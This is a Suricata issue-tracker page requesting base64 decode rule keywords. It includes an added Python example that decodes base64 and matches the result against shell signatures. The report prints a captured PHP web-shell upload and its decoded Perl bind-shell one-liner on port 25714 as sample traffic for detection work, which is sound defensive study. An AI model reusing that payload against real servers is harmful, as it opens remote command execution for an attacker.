Feature #380
Base64 decoding (closed)
Description
I think it is important for Suricata to support Base64 decode/data rule keywords (a few of them).
pcap 22to35.pcap attached.
In it (packet #12 - if you open it with wireshark)
This below is the hex data in packet #12 from 22to35.pcap
This below is the same data as text (ASCII)
; PHPSESSID=[*] Error retrieving cookie! ##here at the end most likely there is missing colon, maybe... Content-Length: 385 --d2tmSI Content-Disposition: form-data; name="userfile"; filename="ObHydBi51Wgr0cjHQI6u.php" Content-Type: text/plain <?php system(base64_decode('cGVybCAtTUlPIC1lICckcD1mb3JrKCk7ZXhpdCxpZiRwO3doaWxlKCRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCwyNTcxNCxSZXVzZSwxLExpc3RlbiktPmFjY2VwdCl7JH4tPmZkb3BlbigkYyx3KTtTVERJTi0+ZmRvcGVuKCRjLHIpO3N5c3RlbSRfIHdoaWxlPD59Jw=='))?> --d2tmSI--
This below is the decoded (from base64) to ASCII data in the "php system(base64_decode..." function
perl -MIO -e '$p=fork();exit,if$p;while($c=new IO::Socket::INET(LocalPort,25714,Reuse,1,Listen)->accept){$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>}'
or the attack itself, since this is a pcap from the cyber games/trainings.
We could effectively still search for the data using rules, but we have to convert text to base64 and use it as "content" and it gets tricky.
It would be much easier if we have base64 decode keyword, since there are a lot of on-line apps that use base64.
packet #7 is the same thing.
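The two halves of the request above, as an added example that is not part of the original report or of Suricata itself: why a "content" match on the encoded form gets tricky (the same plaintext has three base64 spellings depending on its byte offset mod 3), and what a decode-then-match keyword does instead. SAMPLE_BODY is constructed from the ASCII dump on this page; the regex, the signature list and the function names are assumptions of this example, not Suricata's.

```python
import base64
import binascii
import re

# Constructed from the ASCII dump on this issue page: the multipart upload body
# with the base64 blob inside system(base64_decode('...')).
SAMPLE_BODY = (
    b"Content-Disposition: form-data; name=\"userfile\"; "
    b"filename=\"ObHydBi51Wgr0cjHQI6u.php\"\r\n"
    b"Content-Type: text/plain\r\n\r\n"
    b"<?php system(base64_decode('cGVybCAtTUlPIC1lICckcD1mb3JrKCk7ZXhpdCxpZiRwO3doaWxl"
    b"KCRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCwyNTcxNCxSZXVzZSwxLExpc3RlbiktPmFjY2VwdCl7"
    b"JH4tPmZkb3BlbigkYyx3KTtTVERJTi0+ZmRvcGVuKCRjLHIpO3N5c3RlbSRfIHdoaWxlPD59Jw=='))?>\r\n"
    b"--d2tmSI--\r\n"
)

# Candidate base64 runs: 20+ alphabet characters, optional padding (assumed threshold).
BASE64_TOKEN = re.compile(rb"[A-Za-z0-9+/]{20,}={0,2}")

# Plaintext signatures a rule would carry after the decode step; taken from the
# decoded payload shown on this page.
SIGNATURES = [b"perl -MIO", b"IO::Socket::INET", b"fdopen("]


def decode_candidates(body: bytes):
    """Yield (encoded, decoded) for every base64-looking run that decodes cleanly."""
    for m in BASE64_TOKEN.finditer(body):
        token = m.group(0)
        # pad to a multiple of 4 so runs without explicit '=' still decode
        padded = token + b"=" * (-len(token) % 4)
        try:
            decoded = base64.b64decode(padded, validate=True)
        except binascii.Error:
            continue  # not valid base64 after all, e.g. a random identifier
        yield token, decoded


def match_decoded(body: bytes, signatures=SIGNATURES):
    """Decode every candidate blob and return the plaintext signatures found in it.
    This is the decode-then-content behaviour the report asks for."""
    hits = []
    for _, decoded in decode_candidates(body):
        hits.extend(sig for sig in signatures if sig in decoded)
    return hits


def base64_alignments(needle: bytes):
    """Return the three encoded spellings of needle, one per byte offset mod 3.
    Characters that also depend on bytes before or after the needle are dropped,
    so each variant is an exact substring of any stream containing the needle
    at that alignment."""
    head = {0: 0, 1: 2, 2: 3}  # leading chars contaminated by the prefix bytes
    variants = []
    for shift in range(3):
        enc = base64.b64encode(b"\x00" * shift + needle).rstrip(b"=")
        tail = ((shift + len(needle)) * 8) // 6  # last fully determined char
        variants.append(enc[head[shift]:tail])
    return variants


def encoded_form_match(body: bytes, needle: bytes) -> bool:
    """Match on the wire without decoding: succeeds only if all three alignments
    are tried, which is what makes hand-written encoded 'content' rules brittle."""
    return any(variant in body for variant in base64_alignments(needle))


if __name__ == "__main__":
    print("decoded hits:", match_decoded(SAMPLE_BODY))
    naive = base64.b64encode(b"-MIO -e").rstrip(b"=")
    print("naive encoded content present:", naive in SAMPLE_BODY)
    print("alignment-aware encoded match:", encoded_form_match(SAMPLE_BODY, b"-MIO -e"))
```

The naive check fails because "-MIO -e" sits at offset 5 of the plaintext (5 mod 3 = 2), so its on-wire spelling shares no whole characters with base64 of the bare substring; a rule author would have to write three content alternatives for every plaintext pattern. Decoding first, as Suricata's later base64_decode/base64_data keywords do, makes the signature a single plaintext content match.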
Updated by Victor Julien over 12 years ago
- Description updated
- Assignee set to OISF Dev
- Target version set to TBD
Updated by Victor Julien almost 12 years ago
The smtp mime decoding work here https://github.com/inliniac/suricata/pull/224 includes a base64 decoder. Maybe we can use that once it's merged.
Updated by Victor Julien about 9 years ago
This should now be addressed through #1282
Updated by Victor Julien over 8 years ago
- Status changed from New to Closed
- Assignee deleted (OISF Dev)
- Target version deleted (TBD)